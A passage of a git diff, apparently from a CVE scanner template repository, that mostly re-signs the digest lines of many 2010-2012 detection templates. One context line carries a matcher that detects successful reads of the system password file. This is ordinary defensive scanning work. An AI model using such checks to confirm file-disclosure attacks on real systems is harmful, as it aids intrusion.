490a0046304402201f2f6d4b03887f91f05f31e90985ffe041fc19b52146f7a927b36a949b69b27502200af68b38786ac9d14967173b092a4efe378dbf324842eda5736934450c559c42:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022052aabf3c818f63799605eb33167aa840fee9339e6f7a84c0684ed30ea8d352e9022100a66fb820f305c1ebef927eecccd45ce4ad7538e3550cbb860a0e6529cbc86ae5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1870.yaml b/http/cves/2010/CVE-2010-1870.yaml index 79558d6a05..6395aa9c92 100644 --- a/http/cves/2010/CVE-2010-1870.yaml +++ b/http/cves/2010/CVE-2010-1870.yaml @@ -45,4 +45,4 @@ http: - 'LISTSERV Maestro\s+[5678]' - 'Administration Hub 9\.0-[123456780]' - 'Administration Hub [5678]' -# digest: 4a0a00473045022009c28af24d49d9f2b2cd719eef0eab59eb17456cc5d44bc1d3fc2767d24ef9c4022100be33c84b0809ba11233918e74323b720e874f8870e0a84637e4a6b55f773050f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e541bad52cababb6cd2cd61c1b26ab8feaae117ccf9c87d10f7c588ca5d3156202204c61984cd595f1fb51216ffaccaa7ca4e2cca292526bf62b42ccb8aaf95821f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1952.yaml b/http/cves/2010/CVE-2010-1952.yaml index 07b578d433..11d0582f50 100644 --- a/http/cves/2010/CVE-2010-1952.yaml +++ b/http/cves/2010/CVE-2010-1952.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022061129aea74772e6b2b1371d4e9ba2aa09c9f71d86f09cf33e41a27be90867130022100d2644c5fc639b09a774b82d50f93ec5ca8f39406463ee51c885db6833b1deb61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e07e1103f68db3c4d774c16b7c2b4fc90547e70e1a8a8a752e6308c0465fc15302202e39e604eb2d895d4825c9de4334dd75c03176b3cdf972c69e7e55e9487083ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1953.yaml b/http/cves/2010/CVE-2010-1953.yaml index b6d585837a..3bee6f3579 100644 --- a/http/cves/2010/CVE-2010-1953.yaml +++ b/http/cves/2010/CVE-2010-1953.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022038e7b2689d93babc89559d2862b8bc5b183cad389c6e2fed0700cefd3cf3dfdd022100fd31164f65dbbcb7da90ab8bfdc92b82e66296933e903952cbca8a4182cc9e4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d737f13ca5fc25fe5a00569e47bc39dc8c74c5eb793170039da9d8ddd6470d2f022022d723da6b42ee3de6826045e52db5c95f4d96e596eddfbb0eb73dc0b4bca78b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1955.yaml b/http/cves/2010/CVE-2010-1955.yaml index 69eff5b4e1..5c7b96d25e 100644 --- a/http/cves/2010/CVE-2010-1955.yaml +++ b/http/cves/2010/CVE-2010-1955.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b23a4aac6fedfb37e15cc43e7f51bf59ba413a099ae58090b05ee9be66d60314022100cfad298dd85b0b1b0cb1046b79e4e8822f005cb18b4081f3c898c3397cdbcc31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008a8acf3d912e951184f07a48b87c8045691518679ee88020752b9e4dd173a092022100bd260f2ca3cb5ae17b9ccf3bba743bb2963a9fcc9f340e92c95d75d54ae10ea2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1956.yaml b/http/cves/2010/CVE-2010-1956.yaml index f02fa9f751..bdee8941c7 100644 --- a/http/cves/2010/CVE-2010-1956.yaml +++ b/http/cves/2010/CVE-2010-1956.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206e67b1c6317d9843ab60b722ade0f0942e4913d7c3f5630b1c8d19483f638f0c0221009162ad1fcb96f2a504a7f16e9805bc854997ba06eeb3c61adedbf42d4225287e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100858eabd63b6f72843f947e5246274143c6b956b7879d26cbf87d64780ad211df022100c785ac8b95b0a5a99bc41f1ffe795c59c91ba0f621307ff96ab25e35bb5096a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1957.yaml b/http/cves/2010/CVE-2010-1957.yaml index 5e3c5d603c..fc61a3a298 100644 --- a/http/cves/2010/CVE-2010-1957.yaml +++ b/http/cves/2010/CVE-2010-1957.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d140e4c1bf958b49625695ac09664cf37de408e74bc9902c319f6646d10d4de2022100e65a364df1072baccbf87a339592e9ecdd95de20e8dd4b705484ea97dafb2f70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220257730d7812d60cf61ac7279df9ab6ca9bf78181a9c6374ad4d684ad292985da022100d8a43d8b649b8ec95355cb47c4765004ac172a0b0182c730086927f55efcf211:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1977.yaml b/http/cves/2010/CVE-2010-1977.yaml index 5c0a1d9858..b82676c9f8 100644 --- a/http/cves/2010/CVE-2010-1977.yaml +++ b/http/cves/2010/CVE-2010-1977.yaml @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022040f7d241d5e5a884c1963854465cf4831f51f493d326d327351a68621b8ebc3e022100d1c7c3b472c326444bc1b1dd290db71df1dd2cade4f6d02d0d16e10f68ab869b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022050590d4500ed1b763b2bff4f98927178f7e55b44f9a1763caf7f9779d70ffa4c02206df063e8f5d1eebe7a5c628871feeff1823eb31d1b2ba1f3a16634e0e1996343:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1982.yaml b/http/cves/2010/CVE-2010-1982.yaml index e1a7228413..75f553daed 100644 --- a/http/cves/2010/CVE-2010-1982.yaml +++ b/http/cves/2010/CVE-2010-1982.yaml @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009cbc325331da11e25f4fb8d31fd398ac39f41c26c89d567dfd2945557f4275270220384a57dbc3afa51cbb77526db5c0f891e93a2b9153a342bf1de2ccca20f1d5f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b86ef37ec2406ebcd7a572475a092ace4af2e4fda2be5426f1f853176f0c643a02206545a885ccc98c24769c1429820ea52fc4fa78a8ea782584bc48106189b76655:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2036.yaml b/http/cves/2010/CVE-2010-2036.yaml index 0864d1ca53..0bcb0cfb30 100644 --- a/http/cves/2010/CVE-2010-2036.yaml +++ b/http/cves/2010/CVE-2010-2036.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009a903733a1bc7131d855c5d53d11c378d6476b6e613a596b0e25c59edcfd3f92022100d4bc9343ee7c9595b3e44b08de9ce86a8f2d0af8a44d8483514b8ef8f46c7f94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009a3b425ae5ec2bbe01c2787c7d7024e0155bdd84568b28dcfa6e1f464a6bbd9902207b990f2ce66a6360bdb52a7cb037367687c2db90c33ab76fcd01adcbc246470a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2037.yaml b/http/cves/2010/CVE-2010-2037.yaml index d55d60e19c..4b1000b9e2 100644 --- a/http/cves/2010/CVE-2010-2037.yaml +++ b/http/cves/2010/CVE-2010-2037.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022040f5ddf1305890a721c4c1b8140d7c149c2cd3ce17446937f2471e5bebc466d4022100e8a39a2b4cb386864faa905b2dfb3c53d36c6d18fd9fc211a1e6c2d3c1d221b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ba2f173a61884eb77eca05645e474ea0998974ae81cd2f56a2df04bbad2382af022100a52f1e7d8dd7915e7ae5f9d64e3601969a06347ffbbfe263f7c204d53ffc9512:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2050.yaml b/http/cves/2010/CVE-2010-2050.yaml index 1af5b47a92..c533ba23da 100644 --- a/http/cves/2010/CVE-2010-2050.yaml +++ b/http/cves/2010/CVE-2010-2050.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402201528ba80abd9bbc78d30e40e479c27465861d3fa2dd697eb180617ea6e0d81f802202cab5a94649a0d4e9e866b78525516c49a7311601aafcac4bede2efda4bea42a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022072cdaa8c8561d8f802f104a5587be461af0eb4068f8539cb2d673d1e790ae79202205b5ae21b73e9b12635e1776cf8473fec583f1718d6a3bda5b9cc30605ba6b242:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2507.yaml b/http/cves/2010/CVE-2010-2507.yaml index 5cbf79630a..c0ebd7fdb7 100644 --- a/http/cves/2010/CVE-2010-2507.yaml +++ b/http/cves/2010/CVE-2010-2507.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b399f4d9dc6b2c952a2ce9e388b0bc21714fffc806c4a6bb3f768981d57139d802206a1974d7ffcd57ea7f9084e535e8f10afddb089fec9a171050d073c28c510db6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d0fbfb8ffd049aeaf94cf869ef1eb3f0f13b0d27229bb4ed42baa7347337b5e702205a316eeb82abfedeb1294c785875852bd9e3bda4b7d2e32bfaa24f9613e36cb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2680.yaml b/http/cves/2010/CVE-2010-2680.yaml index 5920648367..0206234511 100644 --- a/http/cves/2010/CVE-2010-2680.yaml +++ b/http/cves/2010/CVE-2010-2680.yaml @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022072b515f91c496b58e595115b0d084c1aef00d4c6ee17205d003acb4ab43c571302203b36bc9c01b393ef1b59fd113ab4455849196192ef1900eee38d59ce6a1a60a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044021f5ffc7d61e608cca2478cc4115fe3177e5ed61660e8e13424a4c772b685bb9402210087feaeec186288bbbc891fdd5dc0ba7612f5cfd614be5ffac00907ff4670c362:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2861.yaml b/http/cves/2010/CVE-2010-2861.yaml index a0d36c2f90..45c0984796 100644 --- a/http/cves/2010/CVE-2010-2861.yaml +++ b/http/cves/2010/CVE-2010-2861.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100fb077ddbfc836210d14e4abbde779e3a4801cadf4c5e57973e1675ae37adab3002200a4dff0b074d16f33db367ba0f8a10fb0b418f6e9bf8cdd4f6036ec6db9d649a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206de44a390dc5302759d12fd4001faad67af1b5043d4e5d5a0e99b24cdc4ee516022100e0df13828777ac09065b161cc832acd8bb8369bef83a8222352647a9b20d5b29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2918.yaml b/http/cves/2010/CVE-2010-2918.yaml index a9a05bcd4e..a2ae05ff6f 100644 --- a/http/cves/2010/CVE-2010-2918.yaml +++ b/http/cves/2010/CVE-2010-2918.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210081baa41c250dff048e922e0bd675a0f66fa65d828db6fd1c6cff4362145b014502207a01230528658a21273d20b9529a24d7cf4f605849cae7697de730852ff82435:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200c91419c3b0dbe4afe3e27b165914d136e3f1855987e5f3f1ddeffe3a0eb6669022100d24948753205fe02e60749f58a0130d1567ccb88505cedee18f474e98e61c8bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-3203.yaml b/http/cves/2010/CVE-2010-3203.yaml index 73053d63fa..a3c63c503b 100644 --- a/http/cves/2010/CVE-2010-3203.yaml +++ b/http/cves/2010/CVE-2010-3203.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022030007981511407dd6716097c70d2348b6e7f288e57d05a177e4f9ae0bcf607ef022100aa3436a7609d718ca4639083c1b39f8585519a8c27fd56f228a6af4a2cc3eedf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210086161433d96dea0abbb2460f498faec5e7cc9dc2dac4ae9051982a2ce801d084022016b89bbd96b6df1b01c5144b1077770507e9b836e89044fd5c992e1586fb99df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-4231.yaml b/http/cves/2010/CVE-2010-4231.yaml index b7eeed4fc6..4e77e67d8c 100644 --- a/http/cves/2010/CVE-2010-4231.yaml +++ b/http/cves/2010/CVE-2010-4231.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f3c7c9347f9d8a8e7b83098897aecc1fc6ca5594a43e83505cd43fdd025d6130022100832745cf9064f1897cb80f0caceac6dfa4b448f2bae9f8ca58b1b79ac602e833:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ef798e04d208e6c7944c2de7bd37f63fcc958b0834ef7b0cf0a355a7b866fb15022100c6442d68055cef043c33708877f3fc2667950bb0befd604648e255086d34cac7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-4239.yaml b/http/cves/2010/CVE-2010-4239.yaml index 1c20c4d676..d71ca59e98 100644 --- a/http/cves/2010/CVE-2010-4239.yaml +++ b/http/cves/2010/CVE-2010-4239.yaml @@ -44,4 +44,4 @@ http: - "fonts" - "extensions" condition: and -# digest: 4a0a00473045022100b5b334a2fec00cf5a3aecc1339951bf57de03095d5f4265c23450b3a0c64bb5c02206338a21c9a89350f86820ccc9f08c7d37697834a200669fe085df7763d730318:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d07eddfe6076e3294489122182c54098fc31dc93dfaf0cec95d3140d24aef9800220022764390a506aceb2b9b5bdcc58ada9c586462bf262e0c7d332e98fe5807db4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-4282.yaml b/http/cves/2010/CVE-2010-4282.yaml index c3053847e4..1e44a108c0 100644 --- a/http/cves/2010/CVE-2010-4282.yaml +++ b/http/cves/2010/CVE-2010-4282.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402201b4cbfaddf215e4507727c41a0a0b2a5fe584d66891aa082d5d3e1c647a7bb3402202499125b034828944ede2fdfc1673a00684dbc3abdb877a5ef2baa1824041954:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022028440e6744ab15a712bbddd9e67effbb10196178d3709600c03cdd2e30ade50a02205d3555b2f4623199a271f2977587e15566212b551f0fcf96b961652ce2954fdc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-4977.yaml b/http/cves/2010/CVE-2010-4977.yaml index e93934f80a..d3323122a7 100644 --- a/http/cves/2010/CVE-2010-4977.yaml +++ b/http/cves/2010/CVE-2010-4977.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220090ace41aa0b7a63b491ff1b35ea977e018fd5f7ac4e5bebe586d7c925dab5ef0220211b310be5c582ef6ae23ddaeb61459599b65fb35f6b0ea543195a0f7cdf0a93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200897c3f3a57223199dcdda7ca0d58cb353c96217d295bf61910f84555e8de3dd022100cc179f9666339e72c243c340ca9124694c9b70e3d22b3e0459b0502fb3493085:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-5028.yaml b/http/cves/2010/CVE-2010-5028.yaml index a8375704d5..d0f0ed004e 100644 --- a/http/cves/2010/CVE-2010-5028.yaml +++ b/http/cves/2010/CVE-2010-5028.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100df2b627845f4cfe972f4569690174ffe89b4221f5be16d0a6cb676e29ce2b84202203a4014cdc61ccefa25815adf442d68757eb46d7c0dbe703bf8b7d1739538f26a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210099c8a2ea34e5a300c70e613756972e76528af7ded59250030516965a6a1680710221009bbef457fcbe95c5b31680b9501a35b508099c724f7bb501a8664e2261a4b11c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-5278.yaml b/http/cves/2010/CVE-2010-5278.yaml index 1c896d34d7..8ca4956da3 100644 --- a/http/cves/2010/CVE-2010-5278.yaml +++ b/http/cves/2010/CVE-2010-5278.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008e76f7a4d677f1d7ef95c2948ec7ed1373b61aaf7d8079dee4d600ee0124e6a80220414a9a52b2fc1f231283eec54414a71ccd7fddfadfdfd55c76cddaa64c4d10f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b69cc6b4c42025b13e1bc52d65ea1be1df0981a7add3a28408c4dc8ac8c1bb46022100dc24a3d37f2cc1e1d2ff28b81ed9bd7551744367bd64dfe547edce7f6af21976:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-5286.yaml b/http/cves/2010/CVE-2010-5286.yaml index e0f0e837c0..8fb1e17633 100644 --- a/http/cves/2010/CVE-2010-5286.yaml +++ b/http/cves/2010/CVE-2010-5286.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203fb561e1ab44aaeb747e0238060527aad3bc02b20463ff0f288bc3d2ae95c3ff022062cf30b18e1bd5e1990e6fc55e60e0752092d76ff94a15f6061a6f373e4c3945:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bc54ac25bae7f3d0876f30aa9fb8800f5d6c36ad89fbdc467b19abe6adce7ee102210097102e3aa4222ba9586f8537a69a955c66fa6e99b7e017c1fab3fb3287ccedc3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-0049.yaml b/http/cves/2011/CVE-2011-0049.yaml index c1ddb90003..4d7dc872a1 100644 --- a/http/cves/2011/CVE-2011-0049.yaml +++ b/http/cves/2011/CVE-2011-0049.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200847c0a8d121afe8c41b188ad79df89989aaa8406806a47fe74f2d39e80ff3f0022100de97a86b56c22a25c27f8f4e127d9529cb5d44d6e0cd37714be04e1ec1e30997:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c46ac4d506d810715279cb2fc743fd7a9e3113cfb0b8d83b32f1481e48f48c2c0221008f18720cfdf2ca2a4860386a4b10dfdae5296fbf17f1496b8d0ec261ff5e0156:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-2744.yaml b/http/cves/2011/CVE-2011-2744.yaml index c1e41eb263..731de64f2d 100644 --- a/http/cves/2011/CVE-2011-2744.yaml +++ b/http/cves/2011/CVE-2011-2744.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220754b4ba2abae3c78a2e9e383db1f8a5610313a788aa30bae90556556e31a85d20221009bd64e51d469c11e836eb02211169a9efd4322295b411e2a9afe0f9efa702fa4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022009040bc705006390698b4760bf5d68599fa44e8cd4d06e85d1c53f6d78a66bd9022100dad78daa7c9a9543e18b8cce2f178325d4a18cf5db8fe2c2dab043196bea3e04:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-2780.yaml b/http/cves/2011/CVE-2011-2780.yaml index c20a0b9cc0..5e57c93228 100644 --- a/http/cves/2011/CVE-2011-2780.yaml +++ b/http/cves/2011/CVE-2011-2780.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ab3340adb074a840c8283299b9fac09e4325d3a44d167aa3ac9d2827d14d49bd022100beb78853f6c850bc5953e75678cbccdce68edc349f14b91a45ad79f2eff254cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100db36b1f058c7168f5f8f94f9effb32d1f4c99661d18f96567059bab4e3ec0da80220306d6b230632c77476d53991becda742dc1895da400324ad45d58f94930ed72a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-4336.yaml b/http/cves/2011/CVE-2011-4336.yaml index af3473daeb..742f2d0ceb 100644 --- a/http/cves/2011/CVE-2011-4336.yaml +++ b/http/cves/2011/CVE-2011-4336.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cfd21e5afe0cd33f196e0f14cec829fe42b3b88a61c23a61a2615a34e01d4e6e022100899521b740fb94ec3a62f4001cafe59c17f13519b686323a2cb449a0265b4ad6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022079399ba674e01bef79750102ba44d9f07a38ab29df5b774cdcc4dabfe91f6863022100b53005cb48bf10ff0deb593fd5e876d47b6d70d7915ee69c296452f1088a5198:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-4640.yaml b/http/cves/2011/CVE-2011-4640.yaml index d13df930f1..09462b8d17 100644 --- a/http/cves/2011/CVE-2011-4640.yaml +++ b/http/cves/2011/CVE-2011-4640.yaml @@ -51,4 +51,4 @@ http: - "regex('root:.*:0:0:', body)" - 'status_code_3 == 200' condition: and -# digest: 490a00463044022003bcdf3fd8c489c4c9eb2586491ed5595a9125404ba12366de7a36e801f261ac02200c78ce5a21dff8fd612356d665f441024b862909f23324c8b5ac220196e23ba4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022041d30c6c44480e0b6452ec13d45a918b1c58535eca3e62f6d421984463f22f6f022100972d7303e93712725ab70fa65837727b8aa45f4fc20ec041f4a33ac4e65cc228:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-4804.yaml b/http/cves/2011/CVE-2011-4804.yaml index 4dfc679b6d..135e8a4833 100644 --- a/http/cves/2011/CVE-2011-4804.yaml +++ b/http/cves/2011/CVE-2011-4804.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f5fc8a3ec653d8fb8742134fb6a023a25f0175d8689169686dd9d21181140f0c022100b6b7a735dbecdd4eae6ec785a7a430ca8bc71649f26f8690f71819f2c3f9e3c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220522c81df4d838763aea8850f058981a255d7d59675fdb4c02bbdb06969a0ad83022023f0320748d1a58fedaf54253d38c438cff763b3401e447409b7a5d3f520ddd5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-4926.yaml b/http/cves/2011/CVE-2011-4926.yaml index 30bc5aedd9..b1856cb394 100644 --- a/http/cves/2011/CVE-2011-4926.yaml +++ b/http/cves/2011/CVE-2011-4926.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220059bc7b527414cb8f06e01a058360c21c69b8e26a37af1fc52f6b1d9806c894d022037ddaae6a037f21efaba06fccd5dda6df213960c66b2bbb410e35cb137d415c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f83de4045e23f0aca5040e8aed543ca527c91a15cc2cae8b296ef058dd566b0c02202bb3500a508e65323ec114d0126118c5b4ac2949d083bdee74e4b216a01ec3d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-5106.yaml b/http/cves/2011/CVE-2011-5106.yaml index fa5f475e5c..3fd885384f 100644 --- a/http/cves/2011/CVE-2011-5106.yaml +++ b/http/cves/2011/CVE-2011-5106.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206f0c48064742c5d41e5d5782430cbe65cfb58b1742f92b19ffbe74b895fb4a6702200800d1c7c4d52f58693af881c71484d3dc27308fcee85ac019f1d0f848653aeb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f2d8bf5d9480ea46483ac3aaaced8689aad71b8a211c5fd6d4a46d99c8e57eb5022100a79b8aec839add3b1c2180ff47f3be3e75701ceed4efe24247d9f4b77d793ed2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-5181.yaml b/http/cves/2011/CVE-2011-5181.yaml index f43ff4cd7c..f1a4e9b17b 100644 --- a/http/cves/2011/CVE-2011-5181.yaml +++ b/http/cves/2011/CVE-2011-5181.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c8eb0ed9f6f8db4abbf7cffe6f186b37ccac30d3ad38d467d9b47579b0033590022025ec9d9119baaf1bc72781bc51273b9c33f28d9eeaf791a077df27a3fa109bfa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022021aa179c04ce2a829ef44ba257c42d88cbde9a43eba43b3b07972b29379e757502201f591e5f16db499bbe949d543c95bbde9e5f13caac80365ebfd8d99eba1a4be6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-5265.yaml b/http/cves/2011/CVE-2011-5265.yaml index 8633d31758..8ef215d300 100644 --- a/http/cves/2011/CVE-2011-5265.yaml +++ b/http/cves/2011/CVE-2011-5265.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009c6eda4cfeb3627660a657e9f29bda7dd316dd30227e621d8343d91253fde34902203a28c64036832f68f8fc4dad5d7182cb0a9ada862609f0b3caacef9e6171842a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022072425cfa2e69f5fa975af9f2e3a07d7fb421d28e5e3a6ef9bf4fb15dcd35bb82022062abc830f020b69a5b77fdae924fcab7f7cbd217c9dc1fbbb1eebe9affc4c9b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-0392.yaml b/http/cves/2012/CVE-2012-0392.yaml index 7e1ccbaa8c..357b300c5a 100644 --- a/http/cves/2012/CVE-2012-0392.yaml +++ b/http/cves/2012/CVE-2012-0392.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a3b82c57410275caf8c35b404ffc264121702280145d21c64ba210e9567cb6bf02210090f35b30c75342562029ea63c40b3d65ffd05f8f352fb02c7684cb12de64c278:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e50430794e085ca63102b35b09c53e606d6053f7a358289dbb8a1dab676590b1022012914006ad07c047eaf7c2383f800f1e5dc232a9f738f5497822f03a9a28f876:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-0394.yaml b/http/cves/2012/CVE-2012-0394.yaml index 871de16bef..4323081301 100644 --- a/http/cves/2012/CVE-2012-0394.yaml +++ b/http/cves/2012/CVE-2012-0394.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201c0033f7d56e0c4a4fd3683b701ad52e9bfbc45406087f58789beb95e48a07b4022100aa2ad6d34f8e3503d13c60241edcdd958389ba9fbf8c1c2397823123707fd2e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210099f50866d74ee7d1871049c1a234874fd8a1df1db316942d76ccb8bcb1e8f064022100aae0853112ff4ae4e6bccc269ed1dca993e734d09a3a75aaae9880afa793b6f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-0896.yaml b/http/cves/2012/CVE-2012-0896.yaml index b65085a63e..736305b9e2 100644 --- a/http/cves/2012/CVE-2012-0896.yaml +++ b/http/cves/2012/CVE-2012-0896.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022007e631af643f733a4519a2c1e7800b2069ac9f4a8dde3e52a1f02539bec03612022100c502c5c06225e633254d908221898977dd1bd89c3c42fe77d58cf0b9c0662919:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206799f52e48485817e413edc30bd4f359218ec597770780417e46ddcd8b00e00602207a128007973d0e474c073c18ad434eb21153116741ec63ad256b3e003bae78cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 